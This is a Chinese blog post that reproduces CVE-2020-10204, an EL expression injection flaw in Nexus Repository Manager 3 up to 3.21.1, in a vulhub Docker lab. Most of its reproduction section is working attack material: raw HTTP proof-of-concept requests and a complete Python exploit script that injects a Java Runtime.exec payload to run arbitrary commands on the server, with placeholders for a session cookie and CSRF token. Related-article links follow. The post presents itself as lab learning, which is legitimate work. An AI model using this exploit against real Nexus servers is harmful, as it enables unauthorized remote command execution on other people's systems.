Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10204)

最新推荐文章于 2024-05-23 18:47:59 发布
最新推荐文章于 2024-05-23 18:47:59 发布
阅读量1.1k 收藏
点赞数
分类专栏: 中间件漏洞复现 文章标签: 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/110714810
版权

声明

好好学习,天天向上

漏洞描述

Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞,这个漏洞是CVE-2018-16621的绕过。

影响范围

Nexus Repository Manager 3.x OSS / Pro <= 3.21.1

复现过程

这里使用3.21.1版本

使用vulhub

cd /app/vulhub-master/nexus/CVE-2020-10204

使用docker启动

docker-compose up -d

等待一段时间环境才能成功启动,访问如下链接即可看到Web页面。

http://your-ip:8081

该漏洞需要访问更新角色或创建角色接口,所以我们需要使用账号密码admin:admin登录后台(右上角Sign In)。

登录后,还需要再做一些配置,改密码吖等等

后完后,在登录状态随便一个页面刷新,抓包,获取当前用户的Cookie

然后把Cookie和CSRF Token和替换到下面POC中

POST /service/extdirect HTTP/1.1
Host: 192.168.239.129:8081
Content-Length: 219
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.4256948739162416
Content-Type: application/json
Accept: */*
Origin: http://192.168.239.129:8081
Referer: http://192.168.239.129:8081/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.4256948739162416; NXSESSIONID=c591dca4-4a19-4165-8559-226b81ffc58f
Connection: close

{"action":"coreui_User","method":"update","data":[{"userId":"admin","version":"2","firstName":"admin","lastName":"User","email":"admin@example.org","status":"active","roles":["nxadmin$\\B{3*2}"]}],"type":"rpc","tid":11}

注意一点,换的时候,要改的东西如下,我是试了很多次,才成功

在这里插入图片描述

直接上exp,这个exp其实就和我们正常发包一样,先看exp把,我是在git大佬的基础上修改的,注意我们用的时候把里面的NX-ANTI-CSRF-TOKEN和Cookie内容都替换了,替换的原则和上面POC的原则一样

#!/usr/bin/python3
# -*- coding:utf-8 -*-
# author:zhzyker
# from:https://github.com/zhzyker/exphub

import sys
import requests

if len(sys.argv)!=3:
    print('+---------------------------------------------------------------------------------------------------------+')
    print('+ DES: by zhzyker as https://github.com/zhzyker/exphub                                                    +')
    print('+      CVE-2020-10204 Nexus Repository Manager 3 Remote Code Execution                                    +')
    print('+---------------------------------------------------------------------------------------------------------+')
    print('+ USE: python3 <filename> <url> <cmd>                                                           +')
    print('+ EXP: python3 cve-2020-10204_exp.py http://ip:8081 "touch /tmp/233" +')
    print('+ VER: Nexus Repository Manager 3.x OSS / Pro <= 3.21.1                                                   +')
    print('+---------------------------------------------------------------------------------------------------------+')
    sys.exit(0)

url = sys.argv[1]
vuln_url = url + "/service/extdirect"
cmd = sys.argv[2]

headers = {
    'accept': "application/json",
    'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36",
    'NX-ANTI-CSRF-TOKEN': "0.4256948739162416",
    'Content-Type': "application/json",
    'Cookie': "NX-ANTI-CSRF-TOKEN=0.4256948739162416; NXSESSIONID=c591dca4-4a19-4165-8559-226b81ffc58f"
}
data = """
{"action":"coreui_Role","method":"create","data":[{"version":"","source":"default","id":"1111","name":"2222","description":"3333","privileges":["$\\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('%s')}"],"roles":[]}],"type":"rpc","tid":89}
""" % cmd

r = requests.post(url=vuln_url, headers=headers, data=data, timeout=20)
if r.status_code == 200:
    if "UNIXProcess" in r.text:
        print ("[+] Command Executed Successfully (Not Echo)")
    else:
        print ("[-] Command Execution Failed")
else:
    print ("[-] Target Not CVE-2020-10204 Vuln Good Luck")

替换后,执行

python3 cve-2020-10204_exp.py http://192.168.239.129:8081 "touch /tmp/233"

在这里插入图片描述

同样的道理,我们可以模拟发包

BP中发送一下数据包,和POC一样,替换该替换的地方

POST /service/extdirect HTTP/1.1
Host: 192.168.239.129:8081
Content-Length: 314
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.4256948739162416
Content-Type: application/json
Accept: */*
Origin: http://192.168.239.129:8081
Referer: http://192.168.239.129:8081/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.4256948739162416; NXSESSIONID=c591dca4-4a19-4165-8559-226b81ffc58f
Connection: close

{"action":"coreui_User","method":"update","data":[{"userId":"admin","version":"2","firstName":"admin","lastName":"User","email":"admin@example.org","status":"active","roles":["nxadmin$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}"]}],"type":"rpc","tid":11}

和POC不一样的地方就是,把

$\\B{233*233}

替换成

$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}

在这里插入图片描述

在这里插入图片描述

一定注意,各位在复制我的POC或者EXP时,发送请求的header里面的NX-ANTI-CSRF-TOKEN还有Cookie都要改,细心地小伙伴会发现,我的都改了,而且都一样

使用完后关闭镜像

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down

ocker-compose build
docker-compose up -d


镜像查询(查到的第一列就是ID值)

docker ps -a


进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash


关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-10204/CVE-2020-10199: Nexus Repository Manager3 分析
爱国小白帽
04-07 1669
CVE-2020-10204/CVE-2020-10199: Nexus Repository Manager3 分析 360-CERT [360CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年04月02日, 360CERT监测发现 Sonatype Security Team 官方发布了一则关于 Nexus Repository Manager 3.x ...
Nexus Repository Manager 3 远程命令执行漏洞CVE-2020-10199)
ch258563的博客
06-06 1527
Nexus Repository Manager 3 远程命令执行漏洞CVE-2020-10199)
OWASP 发布开源软件OSS的十大风险,已知漏洞排名第一,首次汇齐了10大类型的攻击案例
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
05-06 847
Sonatype的研究人员2022年报告了一个通过恶意Python包pymafka(pymafka软件包包含一个Python脚本,用于监视主机并确定其操作系统)进行的供应链攻击,该包被上传到流行的PyPI代码源。该软件包试图通过名称仿冒感染用户,希望寻找合法的"pykafka"软件包的受害者可能会打错查询语句而下载恶意软件。pymakfa包如此命名是希望用户能将其与pykafka混淆,后者是一个在企业中广泛使用的Python的Kafka客户端。Kafka是一个开源的分布式事件流平台,被成千上万的公司使用。
CVE-2020-10199 Nexus Repository Manager3远程命令执行漏洞复现
weixin_45260839的博客
05-29 1633
CVE-2020-10199 Nexus Repository Manager3远程命令执行漏洞复现
python requests 爬取nexus库依赖包数据
weixin_39379132的博客
04-24 561
python requests 爬取nexus库依赖包数据
Nexus Repository Manager 3 远程命令执行CVE-2019-7238)复现
thelostworld
03-28 571
Nexus Repository Manager 3 远程命令执行漏洞CVE-2019-7238)复现相关实战项目中遇到,本地搭建环境测试,尝试多种利用方式。一、漏洞背景Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功...
CVE-2019-7238:CVE-2019-7238的Poc-Nexus Repository Manager 3远程执行代码
03-02
CVE-2019-7238 Rico腾讯安全云顶实验室和发现的Nexus Repository Manager 3未经身份验证的远程代码执行< 详细分析(英文): 详细分析(非英语): 安全公告:
Nexus Repository Manager 3.28.1-01
10-26
最新版本的 Nexus Repository Manager 3.28.1-01 Nexus是一个强大的Maven仓库管理器,它极大地简化了本地内部仓库的维护和外部仓库的访问。 如果使用了公共的Maven仓库服务器,可以从Maven中央仓库下载所需要的构件...
nexus-3.37.0-01-win64 - Nexus Repository Manager OSS
12-12
Nexus Repository Manager OSS 由于nexus目前官网上(https://help.sonatype.com/repomanager3/download)已经很难下载了,除非翻墙,故整理了一下目前最新版本的分享一下,有需要的欢迎下载。
[Timeline Sec] - CVE-2020-29436:Nexus3 XML外部实体注入复现1
08-03
声明:请勿用作违法用途,否则后果自负0x01 简介Repository Manager)服务。0x02 漏洞概述编号:CVE-2020-29436/servic
nexus-repository-composer:Nexus Repository Manager的Composer支持(正在进行中!)
03-09
docker run -d -p 8081:8081 --name nexus-repository-composer nexus-repository-composer 有关如何持久存储卷的更多信息,请查看。 现在可以从浏览器访问该应用程序,为 从Nexus Repository Manager版本3.17开始...
Sonatype Nexus Repository 3 路径遍历漏洞复现(CVE-2024-4956)
最新发布
0xSec
05-23 891
2024年5月,Nexus Repository官方Sonatype发布了新补丁,修复了一处路径穿越漏洞CVE-2024-4956。经分析,该漏洞可以通过特定的路径请求来未授权访问系统文件,进而可能导致信息泄露。该漏洞无前置条件且利用简单,建议受影响的客户尽快修复漏洞
私有镜像仓库Nexus3 搭建及使用
dxwd的专栏
07-04 1379
usr/local/nexus3/nexus-3.31.1-01/etc/jetty/jetty-https.xml 中的password。使用Nexus 不用提前上传镜像到私有镜像仓库,Nexus 会自动从配置的remote repository 进行下载。到/etc/systemd/system/目录下创建一个nexus.service 文件即可。重启nexus3 后,使用浏览器打开:https://ip:8443。使用浏览器打开:http://ip:8081。密码保存在如下文件中,首次登陆后修改。
Nexus Repository Manager OSS Pro EL表达式远程代码执行
thelostworld
04-18 138
Nexus Repository Manager OSS Pro EL表达式远程代码执行CVE-2020-10199_10204(学习复现)一、漏洞描述Sonatype Nexus 是一个 Maven 的仓库管理系统,它提供了强大的仓库管理、构件搜索等功能,并且可以用来搭建 Maven 仓库私服,在代理远程仓库的同时维护本地仓库,以节省带宽和时间。在 Nexus Repository Manage...
Nexus3.xx私服搭建
红嘴奎利亚雀 的专栏
08-08 4833
本文已迁移到我的新博客地址:blog.favorstack.io 欢迎访问~ Nexus的介绍参见之前的博文:http://blog.csdn.net/cloud_xy/article/details/46767645 本文是其最新版本3.xx的安装配置教程。 本文基于: Ubuntu 16.04 LTS(x64) nexus-3.0.1-01 OSS Oracle JDK-8u65 nex...
Nexus Repository Manager 3 远程命令执行漏洞 CVE-2020-10204 漏洞复现
ADummy的博客
03-03 564
Nexus Repository Manager 3 远程命令执行漏洞CVE-2020-10204) by ADummy 0x00利用路线 ​ 登录抓包—>获取cookie和csrf token—>burpsuite发包—>命令执行 0x01漏洞介绍 ​ Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞,这个漏洞CVE-2018-16621的绕过
CVE-2020-11444:Nexus Repository Manager 3 远程命令执行漏洞
冬的博客
03-15 7015
简介 Nexus Repository是一个开源的仓库管理系统,可搭建npm、maven等私服。 Nexus 3 任意修改admin密码越权漏洞,可以用低权限用户登录获取sessionID越权进行修改admin用户的密码 影响版本 Nexus Repository Manager 3.x OSS / Pro <= 3.21.1 复现步骤 本文复现环境为攻击机kali,目标机为ubuntu 1、环境搭建 环境搭建利用vulhub中的CVE-2020-10144漏洞环境进行复现,其对应版本为3
Nexus Repository Manager 3 远程命令执行漏洞环境搭建及复现(CVE-2019-7238)
qq_36369941的博客
07-17 3091
简介 Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞。 影响范围 Nexus Repository Manager OSS/Pro 3.6.2 版本到 3.14.0 版...
Sonatype Nexus Repository Manager 怎么执行docker pull
06-08
要在 Sonatype Nexus Repository Manager执行 Docker pull,您需要先创建一个 Docker 代理存储库来缓存 Docker 镜像。以下是执行 Docker pull 的步骤: 1. 登录 Sonatype Nexus Repository Manager 并导航到 "Repositories" 页面。 2. 点击 "Create Repository" 按钮并选择 "docker (proxy)" 选项。 3. 输入仓库的相关信息,包括名称、URL 和可选的认证信息。 4. 点击 "Create Repository" 按钮以创建 Docker 代理存储库。 5. 转到 Docker 主机上,并确保已安装 Docker 客户端。 6. 在命令行中输入 "docker login" 命令,并输入您的 Sonatype Nexus Repository Manager 凭据以登录。 7. 使用以下命令拉取 Docker 镜像: ``` docker pull <nexus-url>/<repository-name>/<image-name>:<tag> ``` 其中,"<nexus-url>" 是 Sonatype Nexus Repository Manager 的 URL,"<repository-name>" 是您创建的 Docker 代理存储库的名称,"<image-name>" 是要拉取的 Docker 镜像名称,"<tag>" 是要拉取的 Docker 镜像标签。 例如,以下命令将从名为 "docker-proxy" 的 Docker 代理存储库中拉取 "nginx" 镜像的 "latest" 标签: ``` docker pull http://<nexus-url>/repository/docker-proxy/nginx:latest ``` 请注意,如果您的 Sonatype Nexus Repository Manager 受到防火墙或代理的限制,则可能需要配置 Docker 客户端以使用代理。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值